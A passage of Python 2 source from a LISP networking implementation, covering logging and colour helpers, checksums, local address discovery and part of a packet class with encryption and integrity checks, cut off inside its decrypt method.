lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px;" ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select a random UDP port for use as the source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
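#
# Illustrative examples (assumed values, shown as comments only):
#
#   lisp_hex_string(255)         returns "ff"
#   lisp_hex_string(2**64 - 1)   returns "ffffffffffffffff" (no trailing "L")
#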
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
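#
# Hypothetical output examples (assumed values), matching the formats listed
# above:
#
#   unicast EID:   "[1000]10.1.0.0/16"
#   (*, G) entry:  "[1000](*, 224.1.1.1/32)"
#   (S, G) entry:  whatever eid.print_sg(group) returns for the pair
#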
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
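#
# Illustrative usage (assumed values): lisp_convert_6to4("::ffff:10.0.0.1")
# returns "10.0.0.1", and lisp_convert_4to6("10.0.0.1") returns a
# lisp_address() holding "::ffff:10.0.0.1". Native IPv6 address strings pass
# through unchanged.
#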
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
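#
# lisp_ip_checksum_selfcheck
#
# Hypothetical helper, not part of the original lispers.net sources. It builds
# a minimal 20-byte IPv4 header, runs lisp_ip_checksum() on it, and verifies
# the standard property that the one's complement sum over the completed
# header folds to 0xffff.
#
def lisp_ip_checksum_selfcheck():
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 17, 0,
        socket.inet_aton("10.0.0.1"), socket.inet_aton("10.0.0.2"))
    header = lisp_ip_checksum(header)
    total = 0
    for word in struct.unpack("!10H", header):
        total += word
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    return(total == 0xffff)
#enddef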
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation, testing an application and the xTR on the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp_myinterfaces{} dictionary array. Key is the device name
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow interface
# names with colons, dashes, and alphanumeric characters.
#
d = device.replace(":", "")
d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get an IPv4 and IPv6 local RLOC of this system.
# Return an array where [0] is an IPv4 RLOC, [1] is an IPv6 RLOC, and [2] is
# the device name they were learned from.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses is less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
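# As an illustrative (assumed) example, a lisp.config line that matches the
# egrep below looks like:
#
#   rle-address = 224.1.1.1
#
# Only lines whose first address byte falls in the 224-239 multicast range
# are collected.
#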
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
self.hash_packet()
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
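    #
    # Illustrative padding arithmetic for cipher_pad() above (values
    # assumed): a 50-byte payload grows to ((50/16) + 1) * 16 = 64 bytes.
    # str.ljust() pads with trailing spaces, which the decapsulator later
    # truncates using the inner header's length field.
    #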
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
        # ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
        # IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
        # Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
            # This is the 4-tuple NAT case. There is another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
